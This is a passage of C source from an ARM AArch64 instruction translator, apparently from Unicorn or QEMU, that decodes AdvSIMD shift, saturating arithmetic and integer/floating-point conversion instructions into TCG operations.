TCGv_i32 tcg_rd_narrowed; TCGv_i64 tcg_final; static NeonGenNarrowEnvFn * const signed_narrow_fns[4][2] = { { gen_helper_neon_narrow_sat_s8, gen_helper_neon_unarrow_sat8 }, { gen_helper_neon_narrow_sat_s16, gen_helper_neon_unarrow_sat16 }, { gen_helper_neon_narrow_sat_s32, gen_helper_neon_unarrow_sat32 }, { NULL, NULL }, }; static NeonGenNarrowEnvFn * const unsigned_narrow_fns[4] = { gen_helper_neon_narrow_sat_u8, gen_helper_neon_narrow_sat_u16, gen_helper_neon_narrow_sat_u32, NULL }; NeonGenNarrowEnvFn *narrowfn; int i; assert(size < 4); if (extract32(immh, 3, 1)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (is_u_shift) { narrowfn = unsigned_narrow_fns[size]; } else { narrowfn = signed_narrow_fns[size][is_u_narrow ? 1 : 0]; } tcg_rn = tcg_temp_new_i64(tcg_ctx); tcg_rd = tcg_temp_new_i64(tcg_ctx); tcg_rd_narrowed = tcg_temp_new_i32(tcg_ctx); tcg_final = tcg_const_i64(tcg_ctx, 0); if (round) { uint64_t round_const = 1ULL << (shift - 1); tcg_round = tcg_const_i64(tcg_ctx, round_const); } else { tcg_round = NULL; } for (i = 0; i < elements; i++) { read_vec_element(s, tcg_rn, rn, i, ldop); handle_shri_with_rndacc(tcg_ctx, tcg_rd, tcg_rn, tcg_round, false, is_u_shift, size+1, shift); narrowfn(tcg_ctx, tcg_rd_narrowed, tcg_ctx->cpu_env, tcg_rd); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd_narrowed); tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize); } if (!is_q) { write_vec_element(s, tcg_final, rd, 0, MO_64); } else { write_vec_element(s, tcg_final, rd, 1, MO_64); } if (round) { tcg_temp_free_i64(tcg_ctx, tcg_round); } tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd_narrowed); tcg_temp_free_i64(tcg_ctx, tcg_final); clear_vec_high(s, is_q, rd); } /* SQSHLU, UQSHL, SQSHL: saturating left shifts */ static void handle_simd_qshl(DisasContext *s, bool scalar, bool is_q, bool src_unsigned, bool dst_unsigned, int immh, int immb, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int size = 32 - clz32(immh) - 1; int shift = immhb - (8 << size); int pass; assert(immh != 0); assert(!(scalar && is_q)); if (!scalar) { if (!is_q && extract32(immh, 3, 1)) { unallocated_encoding(s); return; } /* Since we use the variable-shift helpers we must * replicate the shift count into each element of * the tcg_shift value. */ switch (size) { case 0: shift |= shift << 8; /* fall through */ case 1: shift |= shift << 16; break; case 2: case 3: break; default: g_assert_not_reached(); } } if (!fp_access_check(s)) { return; } if (size == 3) { TCGv_i64 tcg_shift = tcg_const_i64(tcg_ctx, shift); static NeonGenTwo64OpEnvFn * const fns[2][2] = { { gen_helper_neon_qshl_s64, gen_helper_neon_qshlu_s64 }, { NULL, gen_helper_neon_qshl_u64 }, }; NeonGenTwo64OpEnvFn *genfn = fns[src_unsigned][dst_unsigned]; int maxpass = is_q ? 2 : 1; for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); write_vec_element(s, tcg_op, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); } tcg_temp_free_i64(tcg_ctx, tcg_shift); clear_vec_high(s, is_q, rd); } else { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, shift); static NeonGenTwoOpEnvFn * const fns[2][2][3] = { { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_s16, gen_helper_neon_qshl_s32 }, { gen_helper_neon_qshlu_s8, gen_helper_neon_qshlu_s16, gen_helper_neon_qshlu_s32 } }, { { NULL, NULL, NULL }, { gen_helper_neon_qshl_u8, gen_helper_neon_qshl_u16, gen_helper_neon_qshl_u32 } } }; NeonGenTwoOpEnvFn *genfn = fns[src_unsigned][dst_unsigned][size]; MemOp memop = scalar ? size : MO_32; int maxpass = scalar ? 1 : is_q ? 4 : 2; for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, memop); genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift); if (scalar) { switch (size) { case 0: tcg_gen_ext8u_i32(tcg_ctx, tcg_op, tcg_op); break; case 1: tcg_gen_ext16u_i32(tcg_ctx, tcg_op, tcg_op); break; case 2: break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_op); } else { write_vec_element_i32(s, tcg_op, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_op); } tcg_temp_free_i32(tcg_ctx, tcg_shift); if (!scalar) { clear_vec_high(s, is_q, rd); } } } /* Common vector code for handling integer to FP conversion */ static void handle_simd_intfp_conv(DisasContext *s, int rd, int rn, int elements, int is_signed, int fracbits, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); TCGv_i32 tcg_shift = NULL; MemOp mop = size | (is_signed ? MO_SIGN : 0); int pass; if (fracbits || size == MO_64) { tcg_shift = tcg_const_i32(tcg_ctx, fracbits); } if (size == MO_64) { TCGv_i64 tcg_int64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx); for (pass = 0; pass < elements; pass++) { read_vec_element(s, tcg_int64, rn, pass, mop); if (is_signed) { gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int64, tcg_shift, tcg_fpst); } else { gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int64, tcg_shift, tcg_fpst); } if (elements == 1) { write_fp_dreg(s, rd, tcg_double); } else { write_vec_element(s, tcg_double, rd, pass, MO_64); } } tcg_temp_free_i64(tcg_ctx, tcg_int64); tcg_temp_free_i64(tcg_ctx, tcg_double); } else { TCGv_i32 tcg_int32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_float = tcg_temp_new_i32(tcg_ctx); for (pass = 0; pass < elements; pass++) { read_vec_element_i32(s, tcg_int32, rn, pass, mop); switch (size) { case MO_32: if (fracbits) { if (is_signed) { gen_helper_vfp_sltos(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } else { gen_helper_vfp_ultos(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } } else { if (is_signed) { gen_helper_vfp_sitos(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } else { gen_helper_vfp_uitos(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } } break; case MO_16: if (fracbits) { if (is_signed) { gen_helper_vfp_sltoh(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } else { gen_helper_vfp_ultoh(tcg_ctx, tcg_float, tcg_int32, tcg_shift, tcg_fpst); } } else { if (is_signed) { gen_helper_vfp_sitoh(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } else { gen_helper_vfp_uitoh(tcg_ctx, tcg_float, tcg_int32, tcg_fpst); } } break; default: g_assert_not_reached(); } if (elements == 1) { write_fp_sreg(s, rd, tcg_float); } else { write_vec_element_i32(s, tcg_float, rd, pass, size); } } tcg_temp_free_i32(tcg_ctx, tcg_int32); tcg_temp_free_i32(tcg_ctx, tcg_float); } tcg_temp_free_ptr(tcg_ctx, tcg_fpst); if (tcg_shift) { tcg_temp_free_i32(tcg_ctx, tcg_shift); } clear_vec_high(s, elements << size == 16, rd); } /* UCVTF/SCVTF - Integer to FP conversion */ static void handle_simd_shift_intfp_conv(DisasContext *s, bool is_scalar, bool is_q, bool is_u, int immh, int immb, int opcode, int rn, int rd) { int size, elements, fracbits; int immhb = immh << 3 | immb; if (immh & 8) { size = MO_64; if (!is_scalar && !is_q) { unallocated_encoding(s); return; } } else if (immh & 4) { size = MO_32; } else if (immh & 2) { size = MO_16; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } } else { /* immh == 0 would be a failure of the decode logic */ g_assert(immh == 1); unallocated_encoding(s); return; } if (is_scalar) { elements = 1; } else { elements = (8 << is_q) >> size; } fracbits = (16 << size) - immhb; if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, !is_u, fracbits, size); } /* FCVTZS, FVCVTZU - FP to fixedpoint conversion */ static void handle_simd_shift_fpint_conv(DisasContext *s, bool is_scalar, bool is_q, bool is_u, int immh, int immb, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int immhb = immh << 3 | immb; int pass, size, fracbits; TCGv_ptr tcg_fpstatus; TCGv_i32 tcg_rmode, tcg_shift; if (immh & 0x8) { size = MO_64; if (!is_scalar && !is_q) { unallocated_encoding(s); return; } } else if (immh & 0x4) { size = MO_32; } else if (immh & 0x2) { size = MO_16; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } } else { /* Should have split out AdvSIMD modified immediate earlier. */ assert(immh == 1); unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } assert(!(is_scalar && is_q)); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(FPROUNDING_ZERO)); tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, size == MO_16); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); fracbits = (16 << size) - immhb; tcg_shift = tcg_const_i32(tcg_ctx, fracbits); if (size == MO_64) { int maxpass = is_scalar ? 1 : 2; for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); if (is_u) { gen_helper_vfp_touqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_tosqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); } write_vec_element(s, tcg_op, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_op); } clear_vec_high(s, is_q, rd); } else { void (*fn)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); int maxpass = is_scalar ? 1 : ((8 << is_q) >> size); switch (size) { case MO_16: if (is_u) { fn = gen_helper_vfp_touhh; } else { fn = gen_helper_vfp_toshh; } break; case MO_32: if (is_u) { fn = gen_helper_vfp_touls; } else { fn = gen_helper_vfp_tosls; } break; default: g_assert_not_reached(); } for (pass = 0; pass < maxpass; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, pass, size); fn(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus); if (is_scalar) { write_fp_sreg(s, rd, tcg_op); } else { write_vec_element_i32(s, tcg_op, rd, pass, size); } tcg_temp_free_i32(tcg_ctx, tcg_op); } if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } /* AdvSIMD scalar shift by immediate * 31 30 29 28 23 22 19 18 16 15 11 10 9 5 4 0 * +-----+---+-------------+------+------+--------+---+------+------+ * | 0 1 | U | 1 1 1 1 1 0 | immh | immb | opcode | 1 | Rn | Rd | * +-----+---+-------------+------+------+--------+---+------+------+ * * This is the scalar version so it works on a fixed sized registers */ static void disas_simd_scalar_shift_imm(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int immb = extract32(insn, 16, 3); int immh = extract32(insn, 19, 4); bool is_u = extract32(insn, 29, 1); if (immh == 0) { unallocated_encoding(s); return; } switch (opcode) { case 0x08: /* SRI */ if (!is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x00: /* SSHR / USHR */ case 0x02: /* SSRA / USRA */ case 0x04: /* SRSHR / URSHR */ case 0x06: /* SRSRA / URSRA */ handle_scalar_simd_shri(s, is_u, immh, immb, opcode, rn, rd); break; case 0x0a: /* SHL / SLI */ handle_scalar_simd_shli(s, is_u, immh, immb, opcode, rn, rd); break; case 0x1c: /* SCVTF, UCVTF */ handle_simd_shift_intfp_conv(s, true, false, is_u, immh, immb, opcode, rn, rd); break; case 0x10: /* SQSHRUN, SQSHRUN2 */ case 0x11: /* SQRSHRUN, SQRSHRUN2 */ if (!is_u) { unallocated_encoding(s); return; } handle_vec_simd_sqshrn(s, true, false, false, true, immh, immb, opcode, rn, rd); break; case 0x12: /* SQSHRN, SQSHRN2, UQSHRN */ case 0x13: /* SQRSHRN, SQRSHRN2, UQRSHRN, UQRSHRN2 */ handle_vec_simd_sqshrn(s, true, false, is_u, is_u, immh, immb, opcode, rn, rd); break; case 0xc: /* SQSHLU */ if (!is_u) { unallocated_encoding(s); return; } handle_simd_qshl(s, true, false, false, true, immh, immb, rn, rd); break; case 0xe: /* SQSHL, UQSHL */ handle_simd_qshl(s, true, false, is_u, is_u, immh, immb, rn, rd); break; case 0x1f: /* FCVTZS, FCVTZU */ handle_simd_shift_fpint_conv(s, true, false, is_u, immh, immb, rn, rd); break; default: unallocated_encoding(s); break; } } /* AdvSIMD scalar three different * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | * +-----+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_simd_scalar_three_reg_diff(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_u = extract32(insn, 29, 1); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (is_u) { unallocated_encoding(s); return; } switch (opcode) { case 0x9: /* SQDMLAL, SQDMLAL2 */ case 0xb: /* SQDMLSL, SQDMLSL2 */ case 0xd: /* SQDMULL, SQDMULL2 */ if (size == 0 || size == 3) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (size == 2) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, 0, MO_32 | MO_SIGN); read_vec_element(s, tcg_op2, rm, 0, MO_32 | MO_SIGN); tcg_gen_mul_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); switch (opcode) { case 0xd: /* SQDMULL, SQDMULL2 */ break; case 0xb: /* SQDMLSL, SQDMLSL2 */ tcg_gen_neg_i64(tcg_ctx, tcg_res, tcg_res); /* fall through */ case 0x9: /* SQDMLAL, SQDMLAL2 */ read_vec_element(s, tcg_op1, rd, 0, MO_64); gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_op1); break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op1 = read_fp_hreg(s, rn); TCGv_i32 tcg_op2 = read_fp_hreg(s, rm); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); gen_helper_neon_mull_s16(tcg_ctx, tcg_res, tcg_op1, tcg_op2); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res); switch (opcode) { case 0xd: /* SQDMULL, SQDMULL2 */ break; case 0xb: /* SQDMLSL, SQDMLSL2 */ gen_helper_neon_negl_u32(tcg_ctx, tcg_res, tcg_res); /* fall through */ case 0x9: /* SQDMLAL, SQDMLAL2 */ { TCGv_i64 tcg_op3 = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op3, rd, 0, MO_32); gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_op3); break; } default: g_assert_not_reached(); } tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } } static void handle_3same_64(DisasContext *s, int opcode, bool u, TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i64 tcg_rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 64x64->64 opcodes which are shared between the scalar * and vector 3-same groups. We cover every opcode where size == 3 * is valid in either the three-reg-same (integer, not pairwise) * or scalar-three-reg-same groups. */ TCGCond cond; switch (opcode) { case 0x1: /* SQADD */ if (u) { gen_helper_neon_qadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x5: /* SQSUB */ if (u) { gen_helper_neon_qsub_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qsub_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x6: /* CMGT, CMHI */ /* 64 bit integer comparison, result = test ? (2^64 - 1) : 0. * We implement this using setcond (test) and then negating. */ cond = u ? TCG_COND_GTU : TCG_COND_GT; do_cmop: tcg_gen_setcond_i64(tcg_ctx, cond, tcg_rd, tcg_rn, tcg_rm); tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); break; case 0x7: /* CMGE, CMHS */ cond = u ? TCG_COND_GEU : TCG_COND_GE; goto do_cmop; case 0x11: /* CMTST, CMEQ */ if (u) { cond = TCG_COND_EQ; goto do_cmop; } gen_cmtst_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 0x8: /* SSHL, USHL */ if (u) { gen_ushl_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { gen_sshl_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; case 0x9: /* SQSHL, UQSHL */ if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0xa: /* SRSHL, URSHL */ if (u) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; case 0xb: /* SQRSHL, UQRSHL */ if (u) { gen_helper_neon_qrshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qrshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x10: /* ADD, SUB */ if (u) { tcg_gen_sub_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; default: g_assert_not_reached(); } } /* Handle the 3-same-operands float operations; shared by the scalar * and vector encodings. The caller must filter out any encodings * not allocated for the encoding it is dealing with. */ static void handle_3same_float(DisasContext *s, int size, int elements, int fpopcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int pass; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); for (pass = 0; pass < elements; pass++) { if (size) { /* Double */ TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); switch (fpopcode) { case 0x39: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); /* fall through */ case 0x19: /* FMLA */ read_vec_element(s, tcg_res, rd, pass, MO_64); gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x18: /* FMAXNM */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FADD */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1b: /* FMULX */ gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1c: /* FCMEQ */ gen_helper_neon_ceq_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMAX */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1f: /* FRECPS */ gen_helper_recpsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x38: /* FMINNM */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3a: /* FSUB */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3e: /* FMIN */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3f: /* FRSQRTS */ gen_helper_rsqrtsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5b: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5c: /* FCMGE */ gen_helper_neon_cge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5d: /* FACGE */ gen_helper_neon_acge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5f: /* FDIV */ gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7a: /* FABD */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_res); break; case 0x7c: /* FCMGT */ gen_helper_neon_cgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7d: /* FACGT */ gen_helper_neon_acgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } else { /* Single */ TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); switch (fpopcode) { case 0x39: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); /* fall through */ case 0x19: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, MO_32); gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x1a: /* FADD */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1b: /* FMULX */ gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1c: /* FCMEQ */ gen_helper_neon_ceq_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMAX */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1f: /* FRECPS */ gen_helper_recpsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x18: /* FMAXNM */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x38: /* FMINNM */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3a: /* FSUB */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3e: /* FMIN */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3f: /* FRSQRTS */ gen_helper_rsqrtsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5b: /* FMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5c: /* FCMGE */ gen_helper_neon_cge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5d: /* FACGE */ gen_helper_neon_acge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5f: /* FDIV */ gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7a: /* FABD */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_res); break; case 0x7c: /* FCMGT */ gen_helper_neon_cgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7d: /* FACGT */ gen_helper_neon_acgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } if (elements == 1) { /* scalar single so clear high part */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, tcg_tmp, tcg_res); write_vec_element(s, tcg_tmp, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } tcg_temp_free_ptr(tcg_ctx, fpst); clear_vec_high(s, elements * (size ? 8 : 4) > 8, rd); } /* AdvSIMD scalar three same * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+--------+---+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | * +-----+---+-----------+------+---+------+--------+---+------+------+ */ static void disas_simd_scalar_three_reg_same(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); TCGv_i64 tcg_rd; if (opcode >= 0x18) { /* Floating point: U, size[1] and opcode indicate operation */ int fpopcode = opcode | (extract32(size, 1, 1) << 5) | (u << 6); switch (fpopcode) { case 0x1b: /* FMULX */ case 0x1f: /* FRECPS */ case 0x3f: /* FRSQRTS */ case 0x5d: /* FACGE */ case 0x7d: /* FACGT */ case 0x1c: /* FCMEQ */ case 0x5c: /* FCMGE */ case 0x7c: /* FCMGT */ case 0x7a: /* FABD */ break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3same_float(s, extract32(size, 0, 1), 1, fpopcode, rd, rn, rm); return; } switch (opcode) { case 0x1: /* SQADD, UQADD */ case 0x5: /* SQSUB, UQSUB */ case 0x9: /* SQSHL, UQSHL */ case 0xb: /* SQRSHL, UQRSHL */ break; case 0x8: /* SSHL, USHL */ case 0xa: /* SRSHL, URSHL */ case 0x6: /* CMGT, CMHI */ case 0x7: /* CMGE, CMHS */ case 0x11: /* CMTST, CMEQ */ case 0x10: /* ADD, SUB (vector) */ if (size != 3) { unallocated_encoding(s); return; } break; case 0x16: /* SQDMULH, SQRDMULH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd = tcg_temp_new_i64(tcg_ctx); if (size == 3) { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i64 tcg_rm = read_fp_dreg(s, rm); handle_3same_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rm); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rm); } else { /* Do a single operation on the lowest element in the vector. * We use the standard Neon helpers and rely on 0 OP 0 == 0 with * no side effects for all these operations. * OPTME: special-purpose helpers would avoid doing some * unnecessary work in the helper for the 8 and 16 bit cases. */ NeonGenTwoOpEnvFn *genenvfn = NULL; 